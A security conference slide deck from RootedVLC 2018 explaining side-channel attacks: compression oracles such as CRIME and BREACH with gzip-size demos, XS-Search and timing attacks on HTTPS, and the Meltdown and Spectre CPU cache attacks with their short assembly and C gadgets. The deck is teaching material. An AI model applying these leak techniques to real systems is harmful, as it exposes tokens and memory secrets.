
Side-channels Uncovered

Jose Selvi, RootedVLC 2018

© NCC Group July 2018. All rights reserved


But it’s just me :)

Jose Selvi (@JoseSelvi)

15 years in the infosec industry

Principal Security Consultant and


Security Researcher at

SANS Institute Community Instructor

GIAC Security Expert (GSE)

Blogger (sometimes): http://www.pentester.es


$ ls -la /home/jselvi/rootedvlc18/

1. Side-channels in Call For Papers

2. How does a side-channel work?

3. HTTPS: Size-based Attacks

4. HTTPS: Time-based Attacks

5. CPU: Cache-based Attacks

6. Lessons Learnt
CFP Feedback
Processing Feedback
But… accepted in Ekoparty 2017
$ ls -la /home/jselvi/rootedvlc18/ | tail -5

1. Side-channels in Call For Papers

2. How does a side-channel work?

3. HTTPS: Size-based Attacks

4. HTTPS: Time-based Attacks

5. CPU: Cache-based Attacks

6. Lessons Learnt
Side-channels & Pizza Politicians

DAY N DAY N+1 DAY N+2


Back to the real world
Action + Observing = Oracle
What am I?
$ ls -la /home/jselvi/rootedvlc18/ | tail -4

1. Side-channels in Call For Papers

2. How does a side-channel work?

3. HTTPS: Size-based Attacks

4. HTTPS: Time-based Attacks

5. CPU: Cache-based Attacks

6. Lessons Learnt
How does web traffic work?

DNS Request DNS SERVER

WEB SERVER
HTML
(HTTPS)

BROWSER

Scripts

Images WEB SERVER


(HTTPS)
Size-based side-channels
Overview

SERVER BRAIN CAPTURE

CONSOLE
Compression in theory (deflate)

NCC Group is an awesome group of security geeks

NCC Group is an awesome g(-20,4) of security geeks


Compression in practice

$ echo "token=BEEFCAFE1337 token=A" | gzip | wc -c
44
$ echo "token=BEEFCAFE1337 token=B" | gzip | wc -c
43
$ echo "token=BEEFCAFE1337 token=BA" | gzip | wc -c
44
$ echo "token=BEEFCAFE1337 token=BE" | gzip | wc -c
43
$ echo "token=BEEFCAFE1337 token=BEEFCAFE" | gzip | wc -c
43
DEMO
CRIME vs BREACH

CRIME

BROWSER WEB SERVER


(HTTPS)
BREACH
Compress before encrypt still a problem

APP DATA

COMPRESS &
ENCRYPT

USER DATA
Search engine not CSRF-protected (XS-Search)

/search/wrong
100kb

/search/rigg
100kb

BROWSER WEB SERVER


(HTTPS)
/search/righ
200kb

/search/rigi
100kb
What if response size is not stable?

$ curl http://www.google.es | wc -c
12424
$ curl http://www.google.es | wc -c
12401
$ curl http://www.google.es | wc -c
12372
$ curl http://www.google.es | wc -c
12437
$ curl http://www.google.es | wc -c
12423
F****** Javascript from Hell…
$ curl http://www.google.es
[…]
Resource loading side-channel (FIESTA)
DEMO
$ ls -la /home/jselvi/rootedvlc18/ | tail -3

1. Side-channels in Call For Papers

2. How does a side-channel work?

3. HTTPS: Size-based Attacks

4. HTTPS: Time-based Attacks

5. CPU: Cache-based Attacks

6. Lessons Learnt
Overview

SERVER BRAIN

CONSOLE
Size ~= Load time

Nethanel Gelernter @ Blackhat USA 2016


Measuring Time

https://tom.vg/2016/08/browser-based-timing-attacks/
Are timing attacks practical in HTTPS?
Where is the Proof of Concept?
$ ls -la /home/jselvi/rootedvlc18/ | tail -2

1. Side-channels in Call For Papers

2. How does a side-channel work?

3. HTTPS: Size-based Attacks

4. HTTPS: Time-based Attacks

5. CPU: Cache-based Attacks

6. Lessons Learnt
Continuously improving performance
Meltdown & Spectre

https://meltdownattack.com/
CPU Caching

http://archive.arstechnica.com/paedia/c/caching/m-caching-2.html
Out-of-order / Speculative Execution
Meltdown (Out of Order Execution)

access_kernel();
access(probe_array[data * 4096]);

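; rcx = kernel address, rbx = probe array base
again:
    mov al, byte [rcx]          ; read one byte from the kernel address
    shl rax, 0x0C               ; multiply it by 4096
    jz again
    mov rbx, qword [rbx + rax]  ; touch probe_array[data * 4096]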
Meltdown (Out of Order Execution)

00 01 02 03 04 05 06 07 08

510 489 495 502 513 499 105 525 487

again:
    mov al, byte [rcx]
    shl rax, 0x0C
    jz again
    mov rbx, qword [rbx + rax]
Spectre (Speculative Execution)

if ( x < array1_size )
    y = array2[ array1[x] * 4096 ];

1. array1[x] points to a SECRET byte

2. array1_size and array2 are not cached

3. previous values for “x” were valid (so branch predictor will probably think the current value of “x” is valid as well)
Spectre (Speculative Execution)

00 01 02 03 04 05 06 07 08

510 489 495 502 513 499 105 525 487

if ( x < array1_size )
    y = array2[ array1[x] * 4096 ];
Why 4096??

0 4096 8192 12288 16384 20480 24576 28672 32768

access_kernel();
access(probe_array[data * 4096]);

if ( x < array1_size )
    y = array2[ array1[x] * 4096 ];
$ ls -la /home/jselvi/rootedvlc18/ | tail -1

1. Side-channels in Call For Papers

2. How does a side-channel work?

3. HTTPS: Size-based Attacks

4. HTTPS: Time-based Attacks

5. CPU: Cache-based Attacks

6. Lessons Learnt
Lessons Learnt

• Compression is Evil

• Cache is Evil

• Speculative Execution is Evil

• Exploiting side-channels is slow (but it works)

• Avoiding side-channels is difficult (researchers find new ones over and over again).
Thanks a lot! Questions?

jose.selvi@nccgroup.com

jselvi@pentester.es

@JoseSelvi
